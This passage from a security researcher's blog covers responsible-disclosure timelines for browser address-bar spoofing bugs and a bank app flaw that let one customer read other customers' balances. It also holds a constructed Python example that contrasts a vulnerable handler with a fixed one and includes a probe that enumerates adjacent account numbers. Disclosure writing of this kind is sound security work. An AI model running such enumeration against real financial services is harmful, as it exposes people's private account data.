Within a hour and seen the POCs and acknowledge the report and we exchanged few emails.</div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhvTibnQ8M6Ek4WEMeArq2rJwMfBQj1kVFKxt_ifTWYcKSPE56BovE4ihmynryO9TmQ28OLcc6AGgLh_7MDjauELL8Rq9TPv80L3VFCh-hoID1z3uRhVwYTZdrj2CLj7_cDqfAOaePTZY/s1218/2.Jio+Initial+Reply.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1218" data-original-width="1080" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhvTibnQ8M6Ek4WEMeArq2rJwMfBQj1kVFKxt_ifTWYcKSPE56BovE4ihmynryO9TmQ28OLcc6AGgLh_7MDjauELL8Rq9TPv80L3VFCh-hoID1z3uRhVwYTZdrj2CLj7_cDqfAOaePTZY/w355-h400/2.Jio+Initial+Reply.jpeg" width="355" /></a></div><br /><div><br /></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div>Stop Responding - <b>After few email exchange with them they Stop Responding me after Sep 5th 2020</b></div><div><b>Multiple(3) Reminder - Sent on Sep 5th and Sep 17th 2020</b></div><div><b><br /></b></div><div><b><br /></b></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbodnQSqOdEhknMhr2JWRA0nrNHPTpa-OhbhAirwoDcQYe7V3UUKhiz9VLMulCGJBAd94oKJrTa_bcepqy_jz_zpyFH1KdLrRyHuBCrbFEtWN6p3RQBPntow7sFRNqMv56aRU7taEAumc/s1325/3.Jio+Reminder+18+Augu.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1325" data-original-width="1080" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbodnQSqOdEhknMhr2JWRA0nrNHPTpa-OhbhAirwoDcQYe7V3UUKhiz9VLMulCGJBAd94oKJrTa_bcepqy_jz_zpyFH1KdLrRyHuBCrbFEtWN6p3RQBPntow7sFRNqMv56aRU7taEAumc/w326-h400/3.Jio+Reminder+18+Augu.jpeg" width="326" /></a></div><br /><b><br 
/></b></div><div><b><br /></b></div><div><br /></div><div><div><br /></div><br /><b><br /></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGHdvc_QqaTjTByNnMnkMw-LK8bP94Ll3EkR0ChmzgTM7Agbxxreb2olIKqodFos34JsJOWlWbNhUpdzABoBR3DasfHiDZo_XPD0sNp3mssOKYmQE9GE2O_7tloe7F7knZHJqivNC5RA/s1065/4.Jio+Reminder+Reply.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1065" data-original-width="1049" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinGHdvc_QqaTjTByNnMnkMw-LK8bP94Ll3EkR0ChmzgTM7Agbxxreb2olIKqodFos34JsJOWlWbNhUpdzABoBR3DasfHiDZo_XPD0sNp3mssOKYmQE9GE2O_7tloe7F7knZHJqivNC5RA/w394-h400/4.Jio+Reminder+Reply.jpeg" width="394" /></a></div><br /><div><b><br /></b></div><div><b><br /></b></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div><br /></div><div><br /></div><div>Shared Timeline for my of Public Disclosure With Jio Team when they responding- Oct 7th and Oct 14th 2020</div><div>Public Disclosure was about to Out on 8th Nov but due to some issues couldn't make it.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkpSlUdz94Ep4TuzddQwCry1tpVcyRbnGHQCtB20Z25Jpp0sPVHCwwtlD_eqWy3p6q-kOD2zpZV3fEQwvjQcVeJcIylUcRWlTdR4DwAPJ6kW1aJj10npSjybMBJ6LKgUTIOV_n5369nE4/s1280/Jio+Disclose+Email.jpeg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="1048" height="400" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkpSlUdz94Ep4TuzddQwCry1tpVcyRbnGHQCtB20Z25Jpp0sPVHCwwtlD_eqWy3p6q-kOD2zpZV3fEQwvjQcVeJcIylUcRWlTdR4DwAPJ6kW1aJj10npSjybMBJ6LKgUTIOV_n5369nE4/w328-h400/Jio+Disclose+Email.jpeg" width="328" /></a></div><br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><br /></div><div>Final Disclosure Made on- 20th Nov 2020.</div><div>Fixed - Looks like the new version of Jio Browser (Jio Pages) has fixed this issue, not confirmed.</div><div><br /></div><div><b>===========================================================================</b></div><div><br /></div><div><br /></div><div style="text-align: center;"><h1><b>Apple Safari Web Browser Address Bar Spoofing Vulnerability</b></h1></div><div>Just Like this Apple Safari Browser 13.1.1 Running on MacOS Catalina also found vulnerable. Here is the ScreenShot for the same.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs0uu6bdc1ZboR4i7Ot4rjjC9G0VZtCFScJCvtr_rMjXL1cVO-FW8ZA5AkdO7jchAMi9y2Mru29W0fEXM-YMnOsS0POMCFDJQLYYxrvKPcDULC_JrD9T5x8ECGJC5ZqpWOWVeTA34_txU/s684/Screenshot+2020-11-19+at+6.12.23+PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="684" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs0uu6bdc1ZboR4i7Ot4rjjC9G0VZtCFScJCvtr_rMjXL1cVO-FW8ZA5AkdO7jchAMi9y2Mru29W0fEXM-YMnOsS0POMCFDJQLYYxrvKPcDULC_JrD9T5x8ECGJC5ZqpWOWVeTA34_txU/w640-h376/Screenshot+2020-11-19+at+6.12.23+PM.png" width="640" /></a></div><br /><div style="text-align: center;"><br /></div><div><br /></div><div><b>Tested Environment</b><div><b><br /></b><div>Device - Macbook Pro Mid 2012<div>MacOS Catalina 10.15.5</div><div>Safari Version - 13.1.1</div><div><br /></div><div><b>Timeline of Reporting</b></div><div>Initial Report- June 21 
2020</div></div></div></div><div>First Response - June 21 2020</div><div>Public Release of The Fixed - https://support.apple.com/en-in/HT211934 </div><div>Safari 14.0.1</div><div>CVE: 2020-9945</div><div>Acknowledgement of Public Disclosure Approval.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9A_m_itYGLIncUwdoocWjyJizV3a6n95bkaIRpT3B5x1aYBRKNvZOSdHgJ5teMQpfIfV15euCLciWpEXj9BSWgzDYG2EzI0ELJlVaJErSdAmMagZ26u1VvjjgGxq-eRnuapyJbRRcrtk/s1065/IMG_20201205_110508.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1055" data-original-width="1065" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9A_m_itYGLIncUwdoocWjyJizV3a6n95bkaIRpT3B5x1aYBRKNvZOSdHgJ5teMQpfIfV15euCLciWpEXj9BSWgzDYG2EzI0ELJlVaJErSdAmMagZ26u1VvjjgGxq-eRnuapyJbRRcrtk/s320/IMG_20201205_110508.jpg" width="320" /></a></div><div><div style="text-align: left;"><h2 style="text-align: center;"><br /></h2></div><div style="text-align: center;"><div><div><div><br /></div></div></div><div><div style="text-align: left;">===========================================================================</div><div style="text-align: left;"><h2 style="text-align: center;"><b><br /></b></h2><h1 style="text-align: center;">BitDefender Safe Pay Web <b>Browser Address Bar Spoofing Vulnerability</b></h1><div style="text-align: center;"><br /></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;">BitDefender Safe Pay Web Browser is also found affected for the same vulnerability. 
</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div><div>Here is the video demonstration.</div><div><br /></div><div><br /></div></div></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/tT4-Tbe-RaQ" width="320" youtube-src-id="tT4-Tbe-RaQ"></iframe></div><br /><div style="text-align: center;"><br /></div></div><div style="text-align: left;"><div><b>Test Environment:</b></div><div><b>===============</b></div><div>Windows 10 Home 64-bit with latest updates</div><div><b><br /></b></div><div><b>Affected Product Details:</b></div><div><b>=======================</b></div><div>BitDefender AntiVirus Plus 2020</div><div>Build 24.0.26.137</div><div>Last Product Update 14-07-2020 15:21</div></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><b>Timeline</b></div><div style="text-align: left;"><b>First Report</b> - July 21, 2020</div><div style="text-align: left;"><b>Acknowledged</b> - July 28, 2020</div><div style="text-align: left;">CVE-2020-15733</div><div style="text-align: left;"><b>Fix Released</b>: The fix was implemented by October 6th 2020.</div><div style="text-align: left;">Advisory - <a href="https://www.bitdefender.com/support/security-advisories/url-spoofing-vulnerability-bitdefender-safepay-va-8958/">https://www.bitdefender.com/support/security-advisories/url-spoofing-vulnerability-bitdefender-safepay-va-8958/</a></div><div style="text-align: center;"><br /></div><div style="text-align: left;"><div>===========================================================================</div><div><h2 style="text-align: center;"><b><br /></b></h2><h1 style="text-align: center;">F-Secure Safe Android <b>Browser Address Bar Spoofing Vulnerability</b></h1><div style="text-align: center;"><br /></div></div><div><br /></div><div>F-Secure has an inbuilt Android browser called "F-Safe", which was found affected by the same vulnerability.</div><div><br /></div><div><br /></div><div><div style="text-align: center;">Here is the video demonstration.</div><div style="text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/nYn1NtSq2RE" width="320" youtube-src-id="nYn1NtSq2RE"></iframe></div><br /><div style="text-align: center;"><br /></div><div><br style="text-align: center;" /></div></div><div><div><b>Affected Product</b></div><div>Testing Environment - Android 10, Device OnePlus 5T.</div><div>F-Secure Android Antivirus Version - 17.8.0014763 FS_GP</div></div><div><br /></div><div><br /></div><div><div><b>Timeline</b></div><div>First Report - June 14, 2020</div><div>Fix Released via Version 17.9</div><div style="text-align: center;"><br /></div></div><div style="text-align: center;">===========================================================================</div></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><h1 style="text-align: center;">2 more popular browsers were found vulnerable; this blog post will be updated once permission is received from the vendors.</h1><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div><div style="text-align: center;"><br /></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxqrCP_uc3AkL8-CkTDkuk8ujTKh2VfAmMogs33Bq5EbEJXLLPw4wqkWFb3kjlNNk3tqcGNfGyJ3I8qVrgBOtSH9bhPzSCn2SWkiwBa-ANYaMpS9qWYEsgLe4KeFYEakN71LveB83uAgg/s1280/1.Jio+Initial.jpeg" 
style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="847" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxqrCP_uc3AkL8-CkTDkuk8ujTKh2VfAmMogs33Bq5EbEJXLLPw4wqkWFb3kjlNNk3tqcGNfGyJ3I8qVrgBOtSH9bhPzSCn2SWkiwBa-ANYaMpS9qWYEsgLe4KeFYEakN71LveB83uAgg/s320/1.Jio+Initial.jpeg" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh2-JvFlyW0AayBkG8Y4-QOAd97J92NORk0JwLGgeg9P2auiHnVIvURt1xhmIb9EtDXJg0mUvWLgsitf752HpzncD6hxAuN-jrT8GFSF4xQjGnpzHVNc65OITtfIZbIhXr-3bf9MCFSDU/s1280/1.Jio+Initial.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="847" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh2-JvFlyW0AayBkG8Y4-QOAd97J92NORk0JwLGgeg9P2auiHnVIvURt1xhmIb9EtDXJg0mUvWLgsitf752HpzncD6hxAuN-jrT8GFSF4xQjGnpzHVNc65OITtfIZbIhXr-3bf9MCFSDU/s320/1.Jio+Initial.jpeg" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both;"><br /></div><div><br /></div></div><br /></div>
<a href="https://egghunter.in/check.html">link text</a>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-81225917767510612312019-05-11T10:54:00.000+05:302019-05-12T10:26:50.946+05:30Bank Vulnerability : Accessing Account Information of Other Users One in the Top 5 Private Bank Vulnerability - <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<b>Saga of "One of the Top 5 Private Banks" Vulnerability - Accessing Account Information of Other Users</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This disclosure is regarding a vulnerability which remained open for 5 months even after reporting it to bank officials. God knows whether it was actively exploited or not, but it was something serious which the bank should have taken care of, and they did not until 10th May, when I asked them again about the status.<br />
<br />
I found it in the iPad version of the application of "One of the Top 5 Banks" at the end of last year, on Nov 23rd 2018, and it was fixed on 10th May 2019.<br />
<br />
<br />
<a name='more'></a><br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
That vulnerability allowed an intruder to access other users' bank account information, such as their total balance, last transactions, PPF balance and other details as well.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On Nov 22nd 2018 I was doing my bug bounty research at home on iOS applications, and on the same iPad the bank's mobile app was installed, which I had used for my daily banking transactions for the 5 years since I opened my account. In the evening I needed to pay my bills, so I accessed the bank mobile app and paid my bills; meanwhile my proxy was configured by default. I noticed an interesting parameter: the account number. I just changed this to something else, and I was able to access the information of that other account.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I immediately called customer care but unfortunately was not able to connect with them, so I sent them an email. (Airtel network sucks sometimes.)</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj34Aq8E9kiJDOygsq6ckg-sIusoMilErX9BAV0SyJfTJQWEqxyr9yGCf1g4eSjFmmkJ2PeiH8yXh1XbGIJtQM3NgOcClEMicc0npEq7Td0dsxPdASnpanASrtZK2PlLRyhhSqOwG8BOo/s1600/1.JPG" imageanchor="1"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj34Aq8E9kiJDOygsq6ckg-sIusoMilErX9BAV0SyJfTJQWEqxyr9yGCf1g4eSjFmmkJ2PeiH8yXh1XbGIJtQM3NgOcClEMicc0npEq7Td0dsxPdASnpanASrtZK2PlLRyhhSqOwG8BOo/s640/1.JPG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The next day, 24th Nov, I got a call from the customer care team and they asked me to share the information on their email (that email looked like a common one which might be accessible to the whole customer executive team). I asked them to give me the email of an individual who could handle it, to prevent this issue becoming known to everyone in their team, but they insisted I share it there, and I did, with a private POC video!</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxaOpTPNUOr7sZQtl0vTtaz53Bm6qu7wJXA-KqMnYy2cJZUVeqYx7XLpjSF-Jl4TobVcFveMdSyC5sdAskHbBwfjnOBcVUo9H-fzOnPRDRSIcadpI16y6HRSQlu5RjWOWNdpn19vQ2U4/s1600/2.JPG" imageanchor="1"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxaOpTPNUOr7sZQtl0vTtaz53Bm6qu7wJXA-KqMnYy2cJZUVeqYx7XLpjSF-Jl4TobVcFveMdSyC5sdAskHbBwfjnOBcVUo9H-fzOnPRDRSIcadpI16y6HRSQlu5RjWOWNdpn19vQ2U4/s640/2.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On Nov 28th I asked them for an update, and on the same day they replied with an email saying I needed to uninstall and reinstall the app and share the error message, etc. I had shared the video last time, and those guys kept asking me for the error screenshot.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">After all these 4 to 5 email and call communications with their customer care team, I understood that either they were not understanding my email or I was making a mistake while explaining it to them.</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Due to the criticality of the issue, I decided to connect with someone from their security team directly over LinkedIn, and coincidentally I found a senior person from their team. On Nov 28th 2018 I explained all the details to him and sent an email to their official email address with screenshots and video.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
=======================================================</div>
<div style="text-align: left;">
<b>THE ONE WHO HELPS, GET IN TROUBLE</b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>Just the next day, on Nov 29th, I received a trademark complaint on my YouTube channel (YouTube strike notice) saying I had used the "Bank" logo in my video without permission, etc.</b></div>
<div style="text-align: left;">
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdAElEeoIdXh-8o57a2lqDzDpgbYd4rAlmZo4-DL6I3iAlqDDDQWSfAFpDGXW6J-uGfyWRRISsZdq9ywleKV3Kt4PZn1U4SkOvWeouGsdi2wElC8qz_FqbBQqEweKO4VEbgQ1AC7qQ-U/s1600/complaint.PNG" imageanchor="1"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdAElEeoIdXh-8o57a2lqDzDpgbYd4rAlmZo4-DL6I3iAlqDDDQWSfAFpDGXW6J-uGfyWRRISsZdq9ywleKV3Kt4PZn1U4SkOvWeouGsdi2wElC8qz_FqbBQqEweKO4VEbgQ1AC7qQ-U/s640/complaint.PNG" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>I was like: I am helping you out and your team is sending me a strike notice. If I did not take down the video within 48 hours, my channel would be shut down. For my safety I did this and took down the video.</b></div>
<div style="text-align: left;">
=====================================</div>
<div style="text-align: left;">
Lets continue-------</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Due to the critical severity of the issue, I thought this vulnerability would get fixed the next day, within a few hours. On Dec 9th 2018 I asked him for an update regarding the fix; I did not get any reply.</div>
<div style="text-align: left;">
The next day I forgot about it, because I was preparing for my marriage (shopping, grooming, etc. 😛)</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In Feb I came back to my work and was trying to recover from the shock of marriage 😅. I came across the same LinkedIn chat in the morning on 9th May 2019 and asked him for an update again, but got no reply. I immediately checked and was shocked that the vulnerability was still open.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
At the same time I sent an email to that person saying that there had been no response for 5 months, and that I had just checked and the vulnerability was still open.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On the evening of 10th May 2019 I got a message over LinkedIn from someone on their team asking for my mobile number. I shared it and we spoke; he asked me to check again for the vulnerability. I was in the office, so I told him I would update him once I reached home.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
At night I checked and found that the iPad mobile application was now forcing me to update to the iPhone version. It looks like they made some changes in their initial API call to prevent the iPad API/web service from being used anymore.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I cannot share the video because it contains lots of sensitive information, but I have sorted out some POCs which will not disclose any sensitive information.<br />
<br /></div>
<div class="MsoListParagraph" style="text-align: left; text-indent: -18pt;">
<div>
<b>a. Below, on the right, we can see that the account ending in 61 has a total balance of 164800. On the left you can see I am accessing the balance of the account ending in 62, which has a total balance of 144XX.XX</b></div>
<h4 style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0lDlfNB5F8JIHxhHtCJxApnA73bFpIeM7vQY1r884mnPnqDCYB3Q2avovQaEgRV_oZUWjkKnyUZFqMX8YMDVMH12G8Lrp0pIXV4krF6EJ0zDITKbgU99nKvVcP6CujCsnjO8zIfgXFY/s1600/Untitled.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ0lDlfNB5F8JIHxhHtCJxApnA73bFpIeM7vQY1r884mnPnqDCYB3Q2avovQaEgRV_oZUWjkKnyUZFqMX8YMDVMH12G8Lrp0pIXV4krF6EJ0zDITKbgU99nKvVcP6CujCsnjO8zIfgXFY/s640/Untitled.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">Similar to the previous one: on the left you can see I am accessing the balance of the account ending in 63, which has a total balance of 102XX.XX</span></div>
</h4>
</div>
<div style="height: 0px; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFjqILIQdDvFkhIkYIx4-lgr8BO5rwREdjz94StQ3G9jh_fWaMnbI2VhsrCRUqhzG2oy_tHkfF2eFI0Yk9tBvaWXi9N5TcfndGFMKFHmSVyc8d9aiQexQ280gW8Dna0wff_sS53ZLjCM/s1600/Untitled2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFjqILIQdDvFkhIkYIx4-lgr8BO5rwREdjz94StQ3G9jh_fWaMnbI2VhsrCRUqhzG2oy_tHkfF2eFI0Yk9tBvaWXi9N5TcfndGFMKFHmSVyc8d9aiQexQ280gW8Dna0wff_sS53ZLjCM/s640/Untitled2.png" width="640" /></a><br />
<br />
<h4>
According to their team, the iPad app was launched in 2015 but later withdrawn due to the requirement of a SIM to enable it on the device. It looks like the app was a legacy one and was left without updates.<br />Here is the timeline of the disclosure.<br />1) Nov 23rd 2018 - Communicated to the customer care team<br />2) Nov 28th 2018 - Communicated again to the customer care team, but they might not have understood the issue<br />3) Nov 28th 2018 - Connected with someone from "<b>Bank</b>"<br />4) Dec 9th 2018 - Asked for an update but got no response<br />5) May 9th 2019 - Asked for an update again<br />6) May 9th 2019 - Rechecked and found the issue was still open<br />7) May 10th 2019 - Communicated with another person from "<b>Bank</b>" and confirmed the fix.</h4>
<div>
<br /></div>
</div>
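<div style="text-align: left;">
The flaw above is an insecure direct object reference: the API trusted whatever account number the client sent and never asked whether the logged-in customer owned it. The Python below is an added example, not the bank's code and not the author's PoC. It models the vulnerable lookup beside a hardened handler that checks ownership against the authenticated session, an API shape that avoids accepting the identifier at all, and the adjacent-account probe (61 to 62, 63) that confirmed the leak. Every account number, customer id and balance in it is constructed.</div>

```python
"""Insecure direct object reference on an account-balance API: vulnerable
handler, hardened handler, and the adjacent-account probe that confirms it.
Constructed example; the bank's real API, names and numbers are not known."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed sample ledger. The logged-in customer "cust-1" owns only ...61.
ACCOUNTS: Dict[str, dict] = {
    "1000061": {"owner": "cust-1", "balance": 164800.00, "ppf": 25000.00},
    "1000062": {"owner": "cust-2", "balance": 14400.00, "ppf": 0.00},
    "1000063": {"owner": "cust-3", "balance": 10200.00, "ppf": 5000.00},
}


@dataclass(frozen=True)
class Session:
    """What the server actually knows after login: who the caller is."""
    customer_id: str


class Forbidden(Exception):
    """Raised by the hardened handler when the caller does not own the account."""


def balance_vulnerable(session: Session, account_no: str) -> Optional[dict]:
    """Vulnerable pattern: the session proves that *someone* is logged in, but
    the account number comes straight from the request and is used as the
    lookup key without checking who owns it."""
    rec = ACCOUNTS.get(account_no)
    if rec is None:
        return None
    return {"account": account_no, "balance": rec["balance"], "ppf": rec["ppf"]}


def balance_fixed(session: Session, account_no: str) -> dict:
    """Hardened pattern: resolve the record, then require that it belongs to
    the authenticated customer. Unknown and foreign accounts get the same
    error so the endpoint does not confirm which account numbers exist."""
    rec = ACCOUNTS.get(account_no)
    if rec is None or rec["owner"] != session.customer_id:
        raise Forbidden("account not owned by caller")
    return {"account": account_no, "balance": rec["balance"], "ppf": rec["ppf"]}


def own_accounts(session: Session) -> List[str]:
    """Safer API shape: derive the account list from the session instead of
    accepting an identifier from the client at all."""
    return sorted(no for no, rec in ACCOUNTS.items() if rec["owner"] == session.customer_id)


Handler = Callable[[Session, str], Optional[dict]]


def probe_adjacent(handler: Handler, session: Session, own_account: str,
                   span: int = 2) -> List[str]:
    """Tester's check mirroring the PoC: keep the caller's own session, step
    the last two digits of the account number (61 -> 62, 63) and record every
    foreign account whose data comes back."""
    prefix, base = own_account[:-2], int(own_account[-2:])
    leaked: List[str] = []
    for delta in range(1, span + 1):
        candidate = f"{prefix}{base + delta:02d}"
        try:
            data = handler(session, candidate)
        except Forbidden:
            continue
        if data is not None:
            leaked.append(candidate)
    return leaked


if __name__ == "__main__":
    me = Session("cust-1")
    print("vulnerable leaks:", probe_adjacent(balance_vulnerable, me, "1000061"))
    print("fixed leaks:     ", probe_adjacent(balance_fixed, me, "1000061"))
    print("own accounts:    ", own_accounts(me))
```

<div style="text-align: left;">
Against the vulnerable handler the probe returns both neighbouring accounts; against the fixed one it returns nothing, and the caller can only ever reach what own_accounts lists for its session.</div>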
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-54101650589041609302018-11-24T17:34:00.001+05:302019-06-25T13:49:29.779+05:30Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVlRJfphcBEjQgRj4Fff03bTNyGCyJXTlo5x-H7X3CM9gySKBDpyhxKKSQ_LhhNU5j7uZ7_aNDnMcLwFFVKHRGrRM00AhYiXkWxLGo55mJU1aXZWPqa_Qgv2GI-7s4OX_NjJI8xpEVws8/s1600/mutual+funds660_113015080408_050917080340_053017025640.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="660" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVlRJfphcBEjQgRj4Fff03bTNyGCyJXTlo5x-H7X3CM9gySKBDpyhxKKSQ_LhhNU5j7uZ7_aNDnMcLwFFVKHRGrRM00AhYiXkWxLGo55mJU1aXZWPqa_Qgv2GI-7s4OX_NjJI8xpEVws8/s320/mutual+funds660_113015080408_050917080340_053017025640.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Image from - <a href="https://www.businesstoday.in/buzztop/buzztop-personal-finance/how-many-mutual-funds-should-you-own/story/253269.html">https://www.businesstoday.in/buzztop/buzztop-personal-finance/how-many-mutual-funds-should-you-own/story/253269.html</a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3 style="clear: both; text-align: center;">
<b>Indian Mutual Fund Customer Data Is On Risk | Mutual Funds Vulnerability</b></h3>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Mutual funds in India are growing today, and most people invest some part of their income for a better future, building wealth through SIPs and lump sums. In India we have around 34 AMCs. While investing, users need to submit their data, e.g. <b>Name, Email, Address, PAN, Aadhaar Number</b> etc., to AMCs for the KYC process. Critical details like these are useful to cyber criminals who get their hands on them for fraud and other criminal activities.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
I have also invested in a number of AMCs for better wealth in the future. While browsing AMC applications, what I found is that AMCs are not taking their security seriously, which is putting customer data at risk.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
During my research I was able to VIEW and MODIFY data, e.g. Name, Email, PAN card, Aadhaar Number, of other users. I WAS EVEN ABLE TO RESET ANY USER'S PASSWORD WITHOUT ANY USER INTERACTION. (Tested on my relatives' accounts with their permission 😅)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For instance, below we can see the customer details.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
